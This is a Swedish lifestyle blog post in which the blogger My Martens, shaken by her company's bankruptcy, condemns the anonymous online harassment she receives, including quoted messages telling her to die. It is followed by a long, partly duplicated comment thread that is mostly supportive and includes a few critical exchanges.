”Du är ful misslyckad och förtjänar att dö!” -NU RÄCKER DET!

image

Nu är jag uppriktigt sagt förbannad! Jag är så arg så jag skakar!

påhopp, moralkärringar, näthat, förutfattade meningar, jantelag, avundsjuka, anklagelser, rykten, vuxna mobbning, missunnsamhet! m.m

Ja…. Det är vardagsmat i denna extremt ytliga blogg och mediabransch! Men som man brukar säga ”ger man sig in i leken får man leken tåla” delvis håller jag med.

Men allting har en gräns! Vissa väljer att ”Slå tillbaka”  Jag väljer att stå över! Stå över denna låga nivå som näthatet kommer ifrån. Hat föder hat! Det leder ingenstans! 

Man har två val, man väljer själv hur man ska hantera situationer…. Man lär sig av sina egna misstag, allting blir erfarenheter på både gott och ont!

 Som offentlig person så får man lära dig att hantera både för och nackdelar!

Antingen så tar man åt sig och låter sig ätas upp inifrån! Det gjorde jag…. Tidigare! Men inte längre!

Jag står upp för mig Själv, vem jag är och vad jag står för! Jag är fortfarande ung och relativt ”grön” inom denna bransch. Men under mina år sedan TV3 så har jag fått MÅNGA erfarenheter. På både gott och ont såklart! Jag har utvecklats enormt!

Jag står inte för mobbning och näthat! Varken på nätet eller irl! Jag är den personen som inte står bredvid och ser på om en grupp gemensamt attackerar en person. Den sidan har jag inom mig sedan förskolan i Vadstena! Det kan också slå tillbaka hårt ibland, men det känns iallfall rätt i hjärtat!

Nu har jag fått en massa ”anonyma” mail sedan mitt inlägg om konkursen! Majoroteten är positiva, men det är en sidodär 4-5 olika IP-nr som DAGLIGEN kommenterar, mailar och utövar ren och skär j*vla vuxen mobbning! Spekulationer, försök till att provocera fram ännu mera drama! -GE UPP!

Mitt senaste spann utav näthat har haft olika budskap: ,

*Jag ska bli anmäld till Skatteverket,

* ”sex lista på alla upptagna män jag legat med”

*Jag ska anmälas till dagis OCH till socialen.

*Jag är en dålig mamma,

 *”lämna Ludvig till sin pappa, han har det bättre utan dig”

*”Snart vet alla hur det ligger till”

*jag ska passa mig noga, jag kommer förlora mina jobb, mina vänner, och uppmanas att ta livet av mig!

* Jag är ful, misslyckad och förtjänar att dö! 

m.m enligt dessa hat och delvis hotmail!

Dessa mail, kommentarer kommer både inne bloggen, fb, och min mail. Det sållas bort, blockerad och raderas! MEN jag fattar inte grejen, VARFÖR lägger man som privatperson/bloggerskan så mycke energi på att skriva till mig, OM man nu inte gillar mig????? Sluta läs, sluta följ istället! 

 På riktigt! Jag är 28 år, tre företag, ett som just kraschat! Som gör att jag mår som jag mår! Panikångest, sorg, frustration, skam och besvikelse… Men framförallt sorg över mitt livsverk som jag lagt tio av mitt liv på. Tio år av blod, svett och tårar! -Det gör ont, så in i h*lvetes ont! Jag är trött, tom och kan varken sova eller äta! Jag ser ut som en påse skräp, och kämpar dygnet runt!

image

 

 från en dag till en annan så har jag inte längre  x-antal anställda, inga löner, strategi, schemaläggning, annonser, inköp, fakturering till My’s Blommor längre! inget dygnet-runt-jobb! Det ÄR en omställning! Jag har tillfälliga sömnproblem, jag mår inte bra! Men jag står för det, rakt öppet och ärligt! 

Jag famlar i mörker för att inta falla över kanten vid ruinens brant som jag just nu står på!

Jag SKA inte falla över! jag kommer INTE Att tillåta mig själv att göra det!  Det finns bara en väg, och det är upp! På ett eller annat sätt så ska jag ta mig tillbaka! 

Mina andra jobb innehåller fotograferingar, deadline för magasin, träning, utbildning, jag är även ambassadör, skribent, OCH en ensamstående mamma & matte!

HUR skulle ni som kritiserar mig bakom era ”anonyma” namn göra för att få ihop DET livspusslet???? Och varför är man anonym??? Varför sparka på någon som ligger ner????????????!

 borde egentligen inte ens skriva detta inlägget, men ibland behöver man bara få kräkas av sig lite!!!!

Lägg inte elaka kommentarer, man kan ha sin åsikt, men man kan framföra den på olika sätt!!!

Nu ber jag dig som min läsare!

Snälla du, Skriv ingenting om andra bloggare/bloggerskor här inne på min blogg! Även om du menar väl mot mig, så ber jag dig att inte skriva om dom ”andra” som cirkulerat i kommentarsfältet på senaste tiden!

Hat föder hat! Det står jag inte för! det tar jag avstånd ifrån!

 Låt dom som ”håller på” istället stå för den nivån!

Trötta ut det med tysthet och NOLL reaktion!

-Tack på förhand!

/ My Martens

122 Komentarer

 1. Att folk orkar, har de inget eget liv?
  De känner inte dig, vill såra dig… Ännu mer…
  Du är så stark My, jag är helt säker på att du kommer gå stärkt ur detta!
  Kram Camilla

 2. Men!!! Vad är detta för något???
  Hur kan man göra så här mot en medmänniska som går igenom allt som du går igenom nu??? Jag tror jag blir tokig!
  Jävla små dumma små människor! Ringa dagis…..? Ringa SOC….?
  Ursäkta mig!!! Vad jobbar dom själva med?
  Arbetslösa, går på bidrag eller?
  Detta är såna där hur ska jag säga nu för att inte vara så dum…..???
  Nä My! Skit i dom! Dom har ingen aning om hur du har det. Hur det är att driva företag mm……. Åhhhhh……..

 3. Rara fina my sånt ska ingen behöva tåla..jag har följt din resa sen ensam mamma,tycker att du verkar vara en varm mjuk och bra mamma…du har kämpat så släpp alla moral kärringar…kram

 4. Fina, starka My…
  Jag har följt din blogg i många år utan att lämna en kommentar men nu kan jag inte låta bli längre.!!!
  Du är så stark som orkar stå och berätta för oss läsare om allt det du går igenom. Jag beundrar dig. En oerhört fin, varm mamma till din lilleman. Det ska inget ta ifrån dig. Jag lever själv ihop med min man, våra barn som fyller 9 och 7 och är mycket själv eftersom min man driver eget men jag är oerhört imponerad av dig som ensamstående mamma.
  Jag tror på dig och du kommer att resa dig en vacker dag. Låt nu inte dessa näthatare ta energi av dig. Det är fruktansvärt, oförståndigt tycker jag, att hålla på som vissa gör. Vill man inte läsa om dig så gör man ett val. Jag väljer att fortsätta för jag tycker du är oerhört inspirerande och begåvad.
  Kram ❤️

 5. Du skulle behöva någon som läste din post, mail, bloggkommentarer och raderade all skit innan du såg dom. Ett tag i alla fall. Elakhet kan ju knäcka en frisk stark människa. Din pappa kanske skulle kunna? Kvinnor är avundsjuka på dig för du är ung och vacker.
  Nu går du genom ett helvete men inget varar för evigt så snart är du igenom det. Lycka nu till fina blomsterflicka, jag vet att du kommer att ordna en bra framtid för dig och Ludvig. Kram.

 6. Förmodligen har de personer som skriver dessa otrevliga mail, kommentarer mm riktigt trista, tråkiga och händelselösa liv. Därför de avundsjuka och illvilliga mot de som försöker göra något bra av sitt. Helt rätt My att ignorera och inte ge dem näring, strunta i dessa knasigheter.
  Du kommer att fixa detta med allt som stormar just nu, även om det kanske inte känns så vissa stunder. Hur trött, sliten och dåligt du än mår så är det en gnista i dig som många saknar.
  Det kommer att ordna sig med allt med tiden, ibland för livet in en på andra vägar än man tänkt sig från början.
  Krya på dig!

 7. Hej My!
  Jag har följt dig i flera år samt under din säsong på ensam mamma söker.
  Jag är SÅ imponerad av din styrka och mod! Om jag ens hade lite av din styrka o mod. Och att våga gå sin egen väg och göra sin dröm!
  När jag ser dig, ser jag Girl power!!!!
  Dom här människorna som försöker trycka ner dig, alltså jag blir först så förbannad(!!!) men sen ler jag åt dessa tragiska människor att dom orkar lägga ner så mycket tid och ork på just dig, för att dom inte har något liv. Dom är sååå avundsjuka på just dig My för att du har lyckats och vågat och levt din dröm! Det är styrka!
  Du är bäst! Sluta aldrig tro på dig själv!
  Girl power!!! <3

 8. Gillar det du skriver. Du är bra.
  Jag blir så arg på folk som behandlar andra illa.
  Du fixar det men var rädd om dig.
  Kram.

 9. Har inte följt dig tidigare My men började läsa ”ikapp” efter det tråkiga beslut du nu tvingats ta. Jag tycker du är enormt modig som blottat dig själv. Naken & sårbar…
  Stå på dig! Så härligt att du vågar visa både dina bra & mindre roliga sidor. Fortsätt med det, då blir det oxå intressant att läsa din blogg till skillnad mot många andra ytliga bloggar.
  Allt löser sig till det bästa även om man inte kan se det i stunden…
  All kärlek & lycka till
  Jenny

 10. Förstår din frustration och ilska. Detta är inte ok! Usch det gör ont att läsa vad du tvingas utstå. Hoppas allt lugnar ner sig snart för dig. Var rädd om dig, stor kram!

 11. Är själv ingen offentlig person så men valt fel män o vägar och fått och får ta så mkt skit från allt o alla hela tiden… lite komiskt i allt är att folk som inte känner mig är dom som hänger ut mig , mobbar , hatar och snackar… stå på dig My…

 12. Att folk orkar, har de inget eget liv?
  De känner inte dig, vill såra dig… Ännu mer…
  Du är så stark My, jag är helt säker på att du kommer gå stärkt ur detta!
  Kram Camilla

 13. Det god vinner alltid över det onda <3 Tänk så. Gå vidare och nonchalera dem som pratar illa om dig och sviker. Det tar alltid bäst. Kram

 14. Men!!! Vad är detta för något???
  Hur kan man göra så här mot en medmänniska som går igenom allt som du går igenom nu??? Jag tror jag blir tokig!
  Jävla små dumma små människor! Ringa dagis…..? Ringa SOC….?
  Ursäkta mig!!! Vad jobbar dom själva med?
  Arbetslösa, går på bidrag eller?
  Detta är såna där hur ska jag säga nu för att inte vara så dum…..???
  Nä My! Skit i dom! Dom har ingen aning om hur du har det. Hur det är att driva företag mm……. Åhhhhh……..

 15. Rara fina my sånt ska ingen behöva tåla..jag har följt din resa sen ensam mamma,tycker att du verkar vara en varm mjuk och bra mamma…du har kämpat så släpp alla moral kärringar…kram

 16. Fina, starka My…
  Jag har följt din blogg i många år utan att lämna en kommentar men nu kan jag inte låta bli längre.!!!
  Du är så stark som orkar stå och berätta för oss läsare om allt det du går igenom. Jag beundrar dig. En oerhört fin, varm mamma till din lilleman. Det ska inget ta ifrån dig. Jag lever själv ihop med min man, våra barn som fyller 9 och 7 och är mycket själv eftersom min man driver eget men jag är oerhört imponerad av dig som ensamstående mamma.
  Jag tror på dig och du kommer att resa dig en vacker dag. Låt nu inte dessa näthatare ta energi av dig. Det är fruktansvärt, oförståndigt tycker jag, att hålla på som vissa gör. Vill man inte läsa om dig så gör man ett val. Jag väljer att fortsätta för jag tycker du är oerhört inspirerande och begåvad.
  Kram ❤️

 17. Du skulle behöva någon som läste din post, mail, bloggkommentarer och raderade all skit innan du såg dom. Ett tag i alla fall. Elakhet kan ju knäcka en frisk stark människa. Din pappa kanske skulle kunna? Kvinnor är avundsjuka på dig för du är ung och vacker.
  Nu går du genom ett helvete men inget varar för evigt så snart är du igenom det. Lycka nu till fina blomsterflicka, jag vet att du kommer att ordna en bra framtid för dig och Ludvig. Kram.

 18. Förmodligen har de personer som skriver dessa otrevliga mail, kommentarer mm riktigt trista, tråkiga och händelselösa liv. Därför de avundsjuka och illvilliga mot de som försöker göra något bra av sitt. Helt rätt My att ignorera och inte ge dem näring, strunta i dessa knasigheter.
  Du kommer att fixa detta med allt som stormar just nu, även om det kanske inte känns så vissa stunder. Hur trött, sliten och dåligt du än mår så är det en gnista i dig som många saknar.
  Det kommer att ordna sig med allt med tiden, ibland för livet in en på andra vägar än man tänkt sig från början.
  Krya på dig!

 19. Hej My!
  Jag har följt dig i flera år samt under din säsong på ensam mamma söker.
  Jag är SÅ imponerad av din styrka och mod! Om jag ens hade lite av din styrka o mod. Och att våga gå sin egen väg och göra sin dröm!
  När jag ser dig, ser jag Girl power!!!!
  Dom här människorna som försöker trycka ner dig, alltså jag blir först så förbannad(!!!) men sen ler jag åt dessa tragiska människor att dom orkar lägga ner så mycket tid och ork på just dig, för att dom inte har något liv. Dom är sååå avundsjuka på just dig My för att du har lyckats och vågat och levt din dröm! Det är styrka!
  Du är bäst! Sluta aldrig tro på dig själv!
  Girl power!!! <3

 20. Alltså man blir fan mörkrädd. Stå på dig My och hoppas att detta snart tar slut annars får du ta och polisanmäla personerna som skriver. Hoppas bara inte att det är gamla vänner. Man har ju den tanken. Avundsjuka.
  Kram till dig.

 21. Lider med dej!
  Ta en paus från blogg och sociala medier ett tag så du slipper dessa påhopp. Det är nog som det är!
  Kram

 22. Gillar det du skriver. Du är bra.
  Jag blir så arg på folk som behandlar andra illa.
  Du fixar det men var rädd om dig.
  Kram.

 23. Har inte följt dig tidigare My men började läsa ”ikapp” efter det tråkiga beslut du nu tvingats ta. Jag tycker du är enormt modig som blottat dig själv. Naken & sårbar…
  Stå på dig! Så härligt att du vågar visa både dina bra & mindre roliga sidor. Fortsätt med det, då blir det oxå intressant att läsa din blogg till skillnad mot många andra ytliga bloggar.
  Allt löser sig till det bästa även om man inte kan se det i stunden…
  All kärlek & lycka till
  Jenny

 24. Förstår din frustration och ilska. Detta är inte ok! Usch det gör ont att läsa vad du tvingas utstå. Hoppas allt lugnar ner sig snart för dig. Var rädd om dig, stor kram!

 25. Vilka djävla svin rent ut sagt som skriver sådant om dig? Alltså dessa puckon är uppenbarligen djävligt avundsjuka på dig för att du är UNG o SNYGG o INTELLIGENT o galet avundsjuka på att du trots all skit du går igenom ändå ser ut som en liten älva, så vacker utan en massa smink o så fin i glasögon. My man får inte vara både blond snygg o allmänbildad o intelligent som du är för då börjar dessa avundsjuka darra av skräck. Du passar jättefint i blont hår. Skit i dessa åldriga avundsjuka missanpassade typer, du är oåtkomlig för dem.

 26. Är själv ingen offentlig person så men valt fel män o vägar och fått och får ta så mkt skit från allt o alla hela tiden… lite komiskt i allt är att folk som inte känner mig är dom som hänger ut mig , mobbar , hatar och snackar… stå på dig My…

 27. Går det inte att blockera dessa IP-nummer som håller på med detta elände? Inte kloka på en fläck ju att ge sig på en bloggerska som skriver om sitt liv. Lev och låt leva liksom. Gott att du ryter ifrån o fortsätter köra DITT race My. This to shall pass så brukar jag tänka när allt känns överjävligt. Det finns en vilande tröst i den tanken. Och du ser inte alls ut som en påse skräp – som någon kallar dig här bland kommentarerna: blomsterflicka – det ser du ut som o du är ärlig, varm o snäll o kämpar som en gnu o säger ifrån på ett bra sätt – du är vacker inifrån och ut! ❤️

 28. Det god vinner alltid över det onda <3 Tänk så. Gå vidare och nonchalera dem som pratar illa om dig och sviker. Det tar alltid bäst. Kram

 29. Bra skrivet My!
  Måste säga att i allt elände så finns det glöd i dig. Du viker dig inte för det du tror på. Bra!
  Du grejar detta!
  //Madde

 30. Alltså man blir fan mörkrädd. Stå på dig My och hoppas att detta snart tar slut annars får du ta och polisanmäla personerna som skriver. Hoppas bara inte att det är gamla vänner. Man har ju den tanken. Avundsjuka.
  Kram till dig.

 31. Lider med dej!
  Ta en paus från blogg och sociala medier ett tag så du slipper dessa påhopp. Det är nog som det är!
  Kram

 32. Vilka djävla svin rent ut sagt som skriver sådant om dig? Alltså dessa puckon är uppenbarligen djävligt avundsjuka på dig för att du är UNG o SNYGG o INTELLIGENT o galet avundsjuka på att du trots all skit du går igenom ändå ser ut som en liten älva, så vacker utan en massa smink o så fin i glasögon. My man får inte vara både blond snygg o allmänbildad o intelligent som du är för då börjar dessa avundsjuka darra av skräck. Du passar jättefint i blont hår. Skit i dessa åldriga avundsjuka missanpassade typer, du är oåtkomlig för dem.

 33. Går det inte att blockera dessa IP-nummer som håller på med detta elände? Inte kloka på en fläck ju att ge sig på en bloggerska som skriver om sitt liv. Lev och låt leva liksom. Gott att du ryter ifrån o fortsätter köra DITT race My. This to shall pass så brukar jag tänka när allt känns överjävligt. Det finns en vilande tröst i den tanken. Och du ser inte alls ut som en påse skräp – som någon kallar dig här bland kommentarerna: blomsterflicka – det ser du ut som o du är ärlig, varm o snäll o kämpar som en gnu o säger ifrån på ett bra sätt – du är vacker inifrån och ut! ❤️

 34. Bra skrivet My!
  Måste säga att i allt elände så finns det glöd i dig. Du viker dig inte för det du tror på. Bra!
  Du grejar detta!
  //Madde

 35. Ja, kan inte förstår dessa människor som skriver såna hemska saker. Undrar om dom följer olika bloggar för att mobba och komma med hemska kommentarer, förstår att du måste skriva av dig om det!
  Jag har följt Dig i flera år. Du är en fin och varm människa, en toppenbra mamma <3 Och jag är så ledsen att du ska behöva gå igenom det du gör. Men du kommer ut starkare ur det!
  Sköt om dig nu fina My <3 <3 <3

 36. Usch vad ledsen man blir, ta inte åt dig! Tycker du är så cool och modig som vågar dela med dig av ditt liv. Kämpa! Tack för att du vågar! Lycka till med allt.

 37. Helt otroligt hur mycket tid till meningslöst hat folk verkar ha. Du är för intressant för hatarna tydligen. Önskar att du snart slipper idioterna. Små steg framåt varje dag så är du snart hur stark som helst igen. Kram Erika

 38. Bra skrivet! Men det skulle du inte ens behövt göra, förstår inte alls hur man kommentera här hur andra bloggare beter sej, och hur din vänskap eller inte vänskap med någon ser ut! ? Att det ska vara nödvändigt att lägga sten på börda , men intriger, skvaller och drama är väl guldkant på tillvaron för en del tyvärr, slå dövörat till för sån sikt och var riktigt rädd om dej nu ,för kom ihåg att det finns bara en av dej och du är viktig för väldigt många men framförallt för din lilla son . Kram!

 39. Jag har följt dig i flera år samt under din säsong på ensam mamma söker.
  Jag är SÅ imponerad av din styrka och mod! Om jag ens hade lite av din styrka o mod. Och att våga gå sin egen väg och göra sin dröm!
  När jag ser dig, ser jag Girl power!!!!
  Du har en öppen och ärlig blogg det gillar jag
  Styrke kramar ❤️❤️

 40. Bra rytet!
  Jag är djupt imponerad av dig. Din styrka och godhet. Tänk om vi kvinnor skulle kunna stötta och uppmuntra varandra, så bra det skulle kunna bli.
  Kram från en tant (som kommenterar för första gången)

 41. Ja, kan inte förstår dessa människor som skriver såna hemska saker. Undrar om dom följer olika bloggar för att mobba och komma med hemska kommentarer, förstår att du måste skriva av dig om det!

  Jag har följt Dig i flera år. Du är en fin och varm människa, en toppenbra mamma <3 Och jag är så ledsen att du ska behöva gå igenom det du gör. Men du kommer ut starkare ur det!

  Sköt om dig nu fina My <3 <3 <3

 42. Usch vad ledsen man blir, ta inte åt dig! Tycker du är så cool och modig som vågar dela med dig av ditt liv. Kämpa! Tack för att du vågar! Lycka till med allt.

 43. Helt otroligt hur mycket tid till meningslöst hat folk verkar ha. Du är för intressant för hatarna tydligen. Önskar att du snart slipper idioterna. Små steg framåt varje dag så är du snart hur stark som helst igen. Kram Erika

 44. Bra skrivet! Men det skulle du inte ens behövt göra, förstår inte alls hur man kommentera här hur andra bloggare beter sej, och hur din vänskap eller inte vänskap med någon ser ut! ? Att det ska vara nödvändigt att lägga sten på börda , men intriger, skvaller och drama är väl guldkant på tillvaron för en del tyvärr, slå dövörat till för sån sikt och var riktigt rädd om dej nu ,för kom ihåg att det finns bara en av dej och du är viktig för väldigt många men framförallt för din lilla son . Kram!

 45. Jag kan bara inte förstå mig på människor som håller på så där,det är ju nått allvarligt fel på dom! Tycker faktiskt synd om dom. Tanken skulle inte falla mig in att maila,kommentera som dessa människor gör.
  Tycker du är stark My,även om du kanske inte känner så nu men att orka blogga,berätta så väldigt privat hur man mår,det är starkt <3 Du kommer ur det här starkare,det är jag säker på.
  Massor av Kramar <3 <3 <3

 46. Jag kan inte förstå hur vuxna människor kan uttrycka sig så till en medmänniska, varken till någon i sin omgivning eller till en människa man inte ens känner. Räcker det inte med allt hat och elände som pågår i vår värld? Skäms på er, ni som inte kan uppföra er.

 47. Jag har följt dig i flera år samt under din säsong på ensam mamma söker.
  Jag är SÅ imponerad av din styrka och mod! Om jag ens hade lite av din styrka o mod. Och att våga gå sin egen väg och göra sin dröm!
  När jag ser dig, ser jag Girl power!!!!
  Du har en öppen och ärlig blogg det gillar jag
  Styrke kramar ❤️❤️

 48. Bra rytet!
  Jag är djupt imponerad av dig. Din styrka och godhet. Tänk om vi kvinnor skulle kunna stötta och uppmuntra varandra, så bra det skulle kunna bli.
  Kram från en tant (som kommenterar för första gången)

 49. Jag kan bara inte förstå mig på människor som håller på så där,det är ju nått allvarligt fel på dom! Tycker faktiskt synd om dom. Tanken skulle inte falla mig in att maila,kommentera som dessa människor gör.

  Tycker du är stark My,även om du kanske inte känner så nu men att orka blogga,berätta så väldigt privat hur man mår,det är starkt <3 Du kommer ur det här starkare,det är jag säker på.

  Massor av Kramar <3 <3 <3

 50. Jag kan inte förstå hur vuxna människor kan uttrycka sig så till en medmänniska, varken till någon i sin omgivning eller till en människa man inte ens känner. Räcker det inte med allt hat och elände som pågår i vår värld? Skäms på er, ni som inte kan uppföra er.

 51. Mer kärlek, glädje, förlåtelse, väck med jantelagen, mer empati för varandra. Det är några saker som jag skulle vilja önska mig mer i dagens samhälle o i världen. Önska kostar ingenting…
  Så här kommer en stor kram till dig fylld med kärlek o energi <3

 52. Jag vänder mig direkt till er som mobbar, skriver massa skit och trycker ner människor.
  Ni verkar må riktigt riktigt dåligt. Något har gått väldigt snett i era liv. Istället för att försöka krossa en annan människa, försök ta tag i era liv. GÅ I TERAPI. Ni kommer inte må bättre bara för att ni skriver massa strunt. Jag hoppas av hela mitt hjärta att ni inte har barn. Dom barnen kommer i sin tur att skriva elakheter till andra, förmodligen är det barn som mobbar andra barn i skolan. Cirkeln går runt. Ta tag i era miserabla liv NU så kanske ni får ut något av dom åren som ni har kvar. Låt även, om ni har barn, do bo hos någon annan så dom har chansen att bli normala, sunda, empati, och sympatifulla barn. Jag tycker uppriktigt synd om er.
  My, vad dom än skriver. Se det så, som det är, att dom mår så mycket sämre än dig, har så mycket sämre liv, så bry dig inte. Du har väl vänner. Heller få riktiga vänner än många ytliga ”(o)kamrater”.

 53. Mer kärlek, glädje, förlåtelse, väck med jantelagen, mer empati för varandra. Det är några saker som jag skulle vilja önska mig mer i dagens samhälle o i världen. Önska kostar ingenting…
  Så här kommer en stor kram till dig fylld med kärlek o energi <3

 54. Jag vänder mig direkt till er som mobbar, skriver massa skit och trycker ner människor.
  Ni verkar må riktigt riktigt dåligt. Något har gått väldigt snett i era liv. Istället för att försöka krossa en annan människa, försök ta tag i era liv. GÅ I TERAPI. Ni kommer inte må bättre bara för att ni skriver massa strunt. Jag hoppas av hela mitt hjärta att ni inte har barn. Dom barnen kommer i sin tur att skriva elakheter till andra, förmodligen är det barn som mobbar andra barn i skolan. Cirkeln går runt. Ta tag i era miserabla liv NU så kanske ni får ut något av dom åren som ni har kvar. Låt även, om ni har barn, do bo hos någon annan så dom har chansen att bli normala, sunda, empati, och sympatifulla barn. Jag tycker uppriktigt synd om er.

  My, vad dom än skriver. Se det så, som det är, att dom mår så mycket sämre än dig, har så mycket sämre liv, så bry dig inte. Du har väl vänner. Heller få riktiga vänner än många ytliga ”(o)kamrater”.

 55. Det är ”invändigt väldigt små” människor som håller på sådär. De livnär sig på negativitet och dålig energi. Skaka av dig och stå rakryggad. Du är stark, modig och har en enorm kapacitet trots allt som hänt dig! YOU GO GIRL!! Styrkekraaam<3

 56. Men nu igen bara du du o du. Vet ingen som skrivet så lite hur andra har det. O när i tänker på hur länge du håll inne med konkursen. Många mådde nog skit trodde du var dödssjuk.inte ok göra så. Men du ser bara ditt ingen idé o försök säga att massor är tusen gånger hårdare drabbade änn du förstår du det.

  • Fina Mia. Jag pratar bara för mig själv, inte för någon annan. Jag kan bara stå för det jag själv gör, säger, och går igenom. Denna bloggen är en lifestyle blogg. Som handlar om MITT liv. Ibland går det upp, ibland går det ner. Just nu befinner jag mig i en kris. far du illa av min kris så tycker jag inte att du ska läsa min blogg.
   Detta är alltså inte en nyhets-sajt där man får läsa om andra människor… kram

   • Men medge du är ganska ego. O jag tycker man kan skriva om annat med. för mej har det blivit för mycket. O jag ser dej inte som kändis o du är säkert duktig på ditt jobb o toppen mamma. Men så länge innan vi fick veta vad som hänt. O många människor har ju knappt tak över huvudet. Jag ärlig o tycker att du vill ha massor av medlidande. Räcker det inte med vänner o nära o kära. Här är det väll mest främmande människor. Jag vet flera som har det svårt o jag ställer upp men det blir liksom mer synd om dej för folk vet vem du är. Istället kanske dom skulle gå till sin granne o ge en blomma. O i har rätt till mina åsikter vi är alla olika. Gå vidare nu o som sagt många lider i denna värld.

    • Men rara du…. Känner så tycker jag att du ska sluta lösa min blogg! ”Gå vidare nu” Ja, jag försöker…. Så gott jag kan. Mvh

   • Så tina nu mobbar du mej för min åsikt tycker du själv du är en bra människa det visar ju hur du är för du tål inte mina kommentarer o vad jag tycker. Det är inte ok.

    • Lilla Mia, du kanske ska gå vidare till andra bloggar om du stör dig på vad My skriver i sin. När man inte mår bra har man full rätt att vara ego.

   • Håller fullständigt med. En kurs i svenska språket och framförallt när det gäller stavning. Kan inte vara lätt att vara avundsjuk på vackra My som dessutom är väldigt smart o intelligent, du o många andra som det gått snett för i livet, sök psykolog istället för att skriva en massa skit här på bloggen. Passar det inte, men så stick då till något ställe dit solen aldrig lyser istället.

    • Men jag är vacker o bryr mej om andra men i tycker ändå att bloggen är ego. Finns ma ssamänniskor som tänker på andra o utseendet har inte med det o göra. Alla är fina på sitt vis. Men ego nej det finns gränser.

 57. Stäng av kommentarsfunktionen ett tag. Men förstår ju att du gärna vill ha alla positiva kommentarer! ? Kan du be någon granska kommentarerna åt dig? Styrka till dig! <3

 58. Det är ”invändigt väldigt små” människor som håller på sådär. De livnär sig på negativitet och dålig energi. Skaka av dig och stå rakryggad. Du är stark, modig och har en enorm kapacitet trots allt som hänt dig! YOU GO GIRL!! Styrkekraaam<3

 59. Men nu igen bara du du o du. Vet ingen som skrivet så lite hur andra har det. O när i tänker på hur länge du håll inne med konkursen. Många mådde nog skit trodde du var dödssjuk.inte ok göra så. Men du ser bara ditt ingen idé o försök säga att massor är tusen gånger hårdare drabbade änn du förstår du det.

  • Fina Mia. Jag pratar bara för mig själv, inte för någon annan. Jag kan bara stå för det jag själv gör, säger, och går igenom. Denna bloggen är en lifestyle blogg. Som handlar om MITT liv. Ibland går det upp, ibland går det ner. Just nu befinner jag mig i en kris. far du illa av min kris så tycker jag inte att du ska läsa min blogg.
   Detta är alltså inte en nyhets-sajt där man får läsa om andra människor… kram

   • Men medge du är ganska ego. O jag tycker man kan skriva om annat med. för mej har det blivit för mycket. O jag ser dej inte som kändis o du är säkert duktig på ditt jobb o toppen mamma. Men så länge innan vi fick veta vad som hänt. O många människor har ju knappt tak över huvudet. Jag ärlig o tycker att du vill ha massor av medlidande. Räcker det inte med vänner o nära o kära. Här är det väll mest främmande människor. Jag vet flera som har det svårt o jag ställer upp men det blir liksom mer synd om dej för folk vet vem du är. Istället kanske dom skulle gå till sin granne o ge en blomma. O i har rätt till mina åsikter vi är alla olika. Gå vidare nu o som sagt många lider i denna värld.

    • Men rara du…. Känner så tycker jag att du ska sluta lösa min blogg! ”Gå vidare nu” Ja, jag försöker…. Så gott jag kan. Mvh

   • Så tina nu mobbar du mej för min åsikt tycker du själv du är en bra människa det visar ju hur du är för du tål inte mina kommentarer o vad jag tycker. Det är inte ok.

    • Lilla Mia, du kanske ska gå vidare till andra bloggar om du stör dig på vad My skriver i sin. När man inte mår bra har man full rätt att vara ego.

   • Håller fullständigt med. En kurs i svenska språket och framförallt när det gäller stavning. Kan inte vara lätt att vara avundsjuk på vackra My som dessutom är väldigt smart o intelligent, du o många andra som det gått snett för i livet, sök psykolog istället för att skriva en massa skit här på bloggen. Passar det inte, men så stick då till något ställe dit solen aldrig lyser istället.

    • Men jag är vacker o bryr mej om andra men i tycker ändå att bloggen är ego. Finns ma ssamänniskor som tänker på andra o utseendet har inte med det o göra. Alla är fina på sitt vis. Men ego nej det finns gränser.

 60. Kan bara hålla med My, det är ju hennes blogg och ingen annans. Sluta läs hennes blogg om ni inte gillar det som hon skriver och upplever. Hon mår tillräckligt dåligt som hon gör. Varför trycka ner en människa när dom behöver peppas, så dom kan ta små steg uppåt och bli bättre!
  Ta hand om dig My och umgås med din son och dina närmaste för det behöver du!
  Styrkekramar <3

 61. Stäng av kommentarsfunktionen ett tag. Men förstår ju att du gärna vill ha alla positiva kommentarer! 🙂 Kan du be någon granska kommentarerna åt dig? Styrka till dig! <3

 62. Kan bara hålla med My, det är ju hennes blogg och ingen annans. Sluta läs hennes blogg om ni inte gillar det som hon skriver och upplever. Hon mår tillräckligt dåligt som hon gör. Varför trycka ner en människa när dom behöver peppas, så dom kan ta små steg uppåt och bli bättre!
  Ta hand om dig My och umgås med din son och dina närmaste för det behöver du!
  Styrkekramar <3

 63. Många styrkekramar till dig My! Du verkar vara en så fin människa och bara för att du är offentlig är du ju inte mer än människa, dvs du har dina problem som alla andra. Hoppas du ser mellan fingrarna med alla dumma kommentarer och istället suger in dom positiva. Önskar dig all lycka i framtiden! Hälsningar från Finland

 64. Många styrkekramar till dig My! Du verkar vara en så fin människa och bara för att du är offentlig är du ju inte mer än människa, dvs du har dina problem som alla andra. Hoppas du ser mellan fingrarna med alla dumma kommentarer och istället suger in dom positiva. Önskar dig all lycka i framtiden! Hälsningar från Finland

 65. Jag undrar varför du inbjuder och utsätter dig för kommentarer av olika slag. En dagen figurerar. Du halvnaken eller lättklädd med ett stort garv. Gärna ihop med människor som gärna vill synas och vara C eller D kändisar. Glitter och glamour och skumpa ska det också vara. Enl min åsikt vill du gärna. Vara en glamourgirl. Det retar en del. Andra dagar vrålar du och skriker ut din psykiska ohälsa. Det verkar inte vara någon sans och balans i ditt beteende. Om du nu vill försöka komma i balans är mitt råd att du taggar ner och inte sticker ut för mycket.

 66. Jag undrar varför du inbjuder och utsätter dig för kommentarer av olika slag. En dagen figurerar. Du halvnaken eller lättklädd med ett stort garv. Gärna ihop med människor som gärna vill synas och vara C eller D kändisar. Glitter och glamour och skumpa ska det också vara. Enl min åsikt vill du gärna. Vara en glamourgirl. Det retar en del. Andra dagar vrålar du och skriker ut din psykiska ohälsa. Det verkar inte vara någon sans och balans i ditt beteende. Om du nu vill försöka komma i balans är mitt råd att du taggar ner och inte sticker ut för mycket.

 67. Hahaha ” du skriver för mycket om dig själv.. ” måste va en av dom mest pinsamma kommentaren ja läst tror jag. Det är ju en blogg. Som handlar om My’s liv. Hohoho ja smäller av!!
  Att du bara orkar med allt skit som skrivs My… Hoppas du får må bättre snart! Du är en sann kämpe. Kram

 68. Hahaha ” du skriver för mycket om dig själv.. ” måste va en av dom mest pinsamma kommentaren ja läst tror jag. Det är ju en blogg. Som handlar om My’s liv. Hohoho ja smäller av!!
  Att du bara orkar med allt skit som skrivs My… Hoppas du får må bättre snart! Du är en sann kämpe. Kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

